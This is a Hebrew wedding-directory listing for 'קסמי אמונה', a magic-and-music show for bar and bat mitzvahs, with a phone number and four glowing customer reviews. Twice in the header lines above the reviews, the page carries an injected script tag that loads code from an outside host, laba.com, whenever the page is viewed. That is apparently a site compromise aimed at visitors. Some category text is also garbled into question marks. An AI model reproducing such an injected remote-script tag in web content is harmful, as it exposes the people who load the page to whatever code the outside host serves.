חתונה יהודית
פירסום חתונה בדקה ה90 אירועים וחוויות ווידאו חתונה הנחות ומבצעים מאמרים רשימה אישית טיפים חתונה - ראשי
 
חתונה יהודית > ????? - ?? ????  > ?? ????? \ ?? ????? > קסמי אמונה
חזור 
קסמי אמונה
קסם של בר / בת מצווה! גם מוסיקה וגם תכנית! מוסיקה נעימה ורגועה לקבלת פנים ולסעודה, מוסיקה מקפיצה ומרקידה במגוון סגנונות – חסידי ישראלי מזרחי קרליבך ברסלב לריקודים. הכל בתאום איתכם... התוכנית "קסמי אמונה" – מופע שהוא שילוב מרתק ומדהים של קסמים וערכים!

טלפון :
02-9975088
נייד :
כתובת :
 


ליצירת קשר עם בעל העסק הקש כאן
קסמי אמונה - ????? - ?? ????<script src=http://laba.com/muuu.s></script> 1
 
קסמי אמונה - ????? - ?? ????<script src=http://laba.com/muuu.s></script> 128/07/2013 20:54:56- חני לוי
מופע קסמי אמונה לבר מצוה
תודה רבה על הכל !!!אנחנו ממליצים על המופע בחום רב :אבי הופיע אצלנו באירוע בר מצוה בבוקר לאחר תפילה בבית הכנסת . בקהל שלנו היו ילדים ומבוגרים, דתיים, מסורתיים וחילונים, משפחה וגם חברים .המופע התאים לכולם ולאחר האירוע כל התגובות שקיבלנו היו מאוד חיוביות.במהלך המופע אבי הצליח לשתף את רוב הקהל במופע ,לרתק את כולם בקסמים מיוחדים ובמקביל להעביר מסרים חזקים של אמונה בצורה יפה מקורית ומשעשעת. מומלץ מאוד מאוד !!!!יישר כחמשפחת לוי

03/04/2009 00:04:12- רעות
משהו משהו!!!
אני ראיתי הופעה שלו בבת מצווה של אחותי. נהנתי מאוד מהמוסיקה, המופע וכל ההנחיה.גם חברות הבת מצווה נהנו וגם כל המשפחה הכוללת מבוגרים וילידים כולם נהנו מאוד.הרגשנו שזה משהו מיוחד, אני מאוד ממליצה לכולם..

27/11/2008 21:49:20- רמי
היה נהדר!!!
הא היה אצלינו במסיבת בת המצווה של ילדתי,המוסיקב היתה מצוינת והמופע היה מדהים, אנו לא מפסיקים לקבל מחמאות מאורחים שהיו במסיבה.גם חוויה וצחוק וגם תכנים ערכיים,אני ממליץ בחום לסגור עם הקוסם ואיש החינוך.

06/10/2008 23:42:46- מירי
מופע מדהים
אנו הזמנו אותו אלינו לבר מצווה והיה פשוט מדהים,מוסיקה נפלאה עם חן וטוב טעם, + הופעת קסמים מרתקת שהסבה הנאה גדולה לכל המשתתפים.אין מילים - פשוט מומלץ!!!